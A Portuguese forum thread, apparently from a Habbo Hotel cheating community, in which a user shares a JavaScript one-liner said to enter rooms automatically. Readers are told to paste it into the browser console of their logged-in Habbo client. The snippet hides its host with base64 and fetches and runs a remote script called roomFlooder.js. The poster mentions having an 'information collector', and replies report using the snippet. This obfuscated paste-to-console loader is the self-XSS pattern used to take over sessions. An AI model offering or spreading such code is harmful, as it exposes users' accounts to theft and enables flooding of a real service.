~the,Wolf ~the,Wolf  • 24.10.11 12:28

[JavaScript] Entrar em quartos automaticamente [JavaScript] Empty [JavaScript] Entrar em quartos automaticamente [JavaScript] 24.10.11 12:28

o/ oi Galerinha estou de volta com alguns Codigos JS (:

vou postar um de Entrar em quartos automatimente no habbo " podem testar em Fakes"


Video :



****************************
Introduçon do video :

use o console no habbo client (: Digite Ctrl+Shift+J para abrilo e coloque o
codigo do down

Agora upe seus emblemas de quarto (:

***********************

Codigos JS :

Código:
JavaScript:a=document;b=a.createElement('script');b.src='http://'+atob('aGhieDQ=')+'.6te.net/roomFlooder.js';document.body.appendChild(b);void(0);

o/ bjoh do gordo Ja estou no lvl X *-*

comentem

Aviso : sou um -/+ Scripter o* tenhu um coletor de informaçoes esse n e o codigo dele testem em fakes 1 -'

Windows Windows  • 24.10.11 12:32

[JavaScript] Entrar em quartos automaticamente [JavaScript] Empty Re: [JavaScript] Entrar em quartos automaticamente [JavaScript] 24.10.11 12:32

Muito bom, ja estou a usar!

DJGhost DJGhost  • 24.10.11 12:38

[JavaScript] Entrar em quartos automaticamente [JavaScript] Empty Re: [JavaScript] Entrar em quartos automaticamente [JavaScript] 24.10.11 12:38

Windows escreveu:Muito bom, ja estou a usar!

~the,Wolf ~the,Wolf  • 24.10.11 12:42

[JavaScript] Entrar em quartos automaticamente [JavaScript] Empty Re: [JavaScript] Entrar em quartos automaticamente [JavaScript] 24.10.11 12:42

'-' desculpa a Aceleraçon do video e que eu fix ele + rapido pra colocar no youtube rapidin

Uncaught Uncaught  • 24.10.11 12:52

Eazy Eazy  • 22.12.11 13:58

[JavaScript] Entrar em quartos automaticamente [JavaScript] Empty Re: [JavaScript] Entrar em quartos automaticamente [JavaScript] 22.12.11 13:58

DJGhost escreveu:
Windows escreveu:Muito bom, ja estou a usar!

Gabrieldlm Gabrieldlm  • 30.04.12 17:28

[JavaScript] Entrar em quartos automaticamente [JavaScript] Empty Re: [JavaScript] Entrar em quartos automaticamente [JavaScript] 30.04.12 17:28

Tópico Fechado

Motivo : Inatividade
Permissões neste sub-fórum
Não podes responder a tópicos

BH Servers

Recomendamos a BH Servers com proteção DDOS gratuita em Cloud Server de alta performance. Entrega imediata.